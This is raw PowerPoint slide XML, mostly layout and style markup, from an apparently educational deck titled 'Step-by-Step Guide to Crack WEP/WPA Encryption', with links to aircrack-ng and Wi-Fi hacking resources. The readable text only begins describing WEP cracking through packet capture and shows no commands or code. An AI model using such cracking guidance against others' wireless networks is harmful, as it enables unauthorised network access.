              <a:buNone/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7150100" y="914400"/>
            <a:ext cx="10680700" cy="7200900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23/05/28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7010400" y="924951"/>
            <a:ext cx="10058400" cy="54864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57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23/05/28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62000" y="7490640"/>
            <a:ext cx="11734800" cy="783432"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:buNone/>
              <a:defRPr sz="36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762000" y="8299827"/>
            <a:ext cx="11734800" cy="1152525"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="195941" tIns="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/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28700" y="1576347"/>
            <a:ext cx="17259300" cy="3572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09600" y="2331244"/>
            <a:ext cx="17373600" cy="6788945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="163284" tIns="81642" rIns="163284" bIns="81642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12954000" y="114301"/>
            <a:ext cx="5029200" cy="433388"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="163284" tIns="81642" rIns="163284" bIns="81642"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr kumimoji="0" sz="21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23/05/28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6248400" y="114301"/>
            <a:ext cx="6705600" cy="433388"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="163284" tIns="81642" rIns="163284" bIns="81642"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr kumimoji="0" sz="21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6459200" y="9715501"/>
            <a:ext cx="1524000" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="163284" tIns="81642" rIns="163284" bIns="81642"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr kumimoji="0" sz="21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609600" y="685800"/>
            <a:ext cx="17373600" cy="1257300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="163284" tIns="81642" rIns="163284" bIns="81642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028700" y="1576347"/>
            <a:ext cx="17259300" cy="3572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28700" y="1586980"/>
            <a:ext cx="17259300" cy="3572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xStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:buNone/>
        <a:defRPr kumimoji="0" sz="64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612317" indent="-612317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5700" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="1326686" indent="-510264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5000" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="2041055" indent="-408211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4300" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="2857477" indent="-408211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3600" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="3673899" indent="-408211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5pPr>
      <a:lvl6pPr marL="4490321" indent="-408211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6pPr>
      <a:lvl7pPr marL="5306743" indent="-408211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2900" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="6123165" indent="-408211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29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6939587" indent="-408211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25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81642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6328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4492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32656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40821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48985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57149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65313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rcrack-ng.org/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://informationsecurityasia.com/what-is-ccmp/#:~:text=The%20abbreviation%20CCMP%20stands%20for%20Counter-Mode%2FCBC-MAC%20Protocol%20%28in,and%20is%20used%20to%20secure%20WLANs%20with%20WPA2." TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.eccouncil.org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torengenius.engeniustech.com/en/articles/6708681-what-is-a-pre-shared-key-psk" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Extensible_Authentication_Protocol" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.freecodecamp.org/news/wi-fi-hacking-101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1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AB0BA85-0789-1180-583D-CF8FBF9FA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52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7147" y="1526423"/>
            <a:ext cx="10235253" cy="6893677"/>
            <a:chOff x="1347147" y="1526423"/>
            <a:chExt cx="10417175" cy="72294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5323" y="1526423"/>
              <a:ext cx="8648699" cy="72294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47147" y="2983637"/>
              <a:ext cx="6217285" cy="4319905"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="6217284" h="4319905">
                  <a:moveTo>
                    <a:pt x="5134717" y="4319725"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="189468" y="4319725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139100" y="4312962"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93840" y="4293876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55494" y="4264271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25868" y="4225953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6768" y="4180726"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="4130395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="189330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6768" y="138998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25868" y="93771"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55494" y="55453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93840" y="25849"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139100" y="6763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189468" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6027446" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6099953" y="14411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6161421" y="55453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6202493" y="116876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6216916" y="189330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6216916" y="1072870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6202493" y="1145324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6161421" y="1206747"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6099953" y="1247788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6027446" y="1262200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4310838" y="1262200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4260469" y="1268963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4215209" y="1288049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4176863" y="1317654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4147237" y="1355972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4128137" y="1401199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4121369" y="1451530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4121369" y="1849019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4128137" y="1899351"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4147237" y="1944578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4176863" y="1982896"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4215209" y="2012500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4260469" y="2031586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4310838" y="2038349"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5134717" y="2038349"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5171853" y="2042021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5239834" y="2070159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5292353" y="2122639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5320512" y="2190570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5324186" y="2227679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5324186" y="4130395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5309763" y="4202848"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5268692" y="4264271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5207223" y="4305313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5171853" y="4316053"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5134717" y="43197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539523" y="3067304"/>
            <a:ext cx="5828030" cy="402411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8020"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="260"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="5400" b="1" spc="20" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5400" b="1" spc="-385" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5400" b="1" spc="-100" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5400" b="1" spc="-330" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5400" b="1" spc="-675" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5400" b="1" spc="-330" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5400" b="1" spc="-495" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>y</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5400" b="1" spc="-675" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5400" b="1" spc="20" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5400" b="1" spc="-385" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5400" b="1" spc="-100" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5400" b="1" spc="-215" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>p  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5400" b="1" spc="120" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>G</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5400" b="1" spc="-585" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5400" b="1" spc="-430" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5400" b="1" spc="-330" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5400" b="1" spc="-95" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5400" b="1" spc="-545" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5400" b="1" spc="-385" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5400" b="1" spc="-110" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>o  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5400" b="1" spc="380" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5400" b="1" spc="-580" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5400" b="1" spc="-440" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5400" b="1" spc="305" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5400" b="1" spc="-300" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>k</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5400" b="1" spc="-545" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5400" b="1" spc="85" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5400" b="1" spc="-390" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5400" b="1" spc="-210" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5400" b="1" spc="-210" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>/WPA</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5400" b="1" spc="-210" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5400" b="1" spc="-365" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>Encryption</a:t>
            </a:r>
            <a:endParaRPr sz="54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25401" y="2983637"/>
            <a:ext cx="4032270" cy="3953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3200" spc="90" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-135" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-55" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="155" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-85" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>k</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-100" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-120" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="20" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-145" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="165" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-40" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="70" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-145" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="60" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-120" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="155" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-135" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-95" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>y</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="15" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-75" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-100" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="55" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-80" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>n  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-100" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-120" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-155" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>v</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="55" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-155" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>v</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="60" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="70" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-145" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="155" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-55" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="15" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-75" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-114" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-135" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-100" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-120" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="20" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-145" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="15" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-55" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-75" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-40" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>a  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="15" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-55" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="155" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-85" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>k</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="60" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-75" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="65" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-190" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-14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f</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-100" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-120" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="15" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-100" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-120" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="20" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-145" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-75" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-120" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>h</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="65" dirty="0">
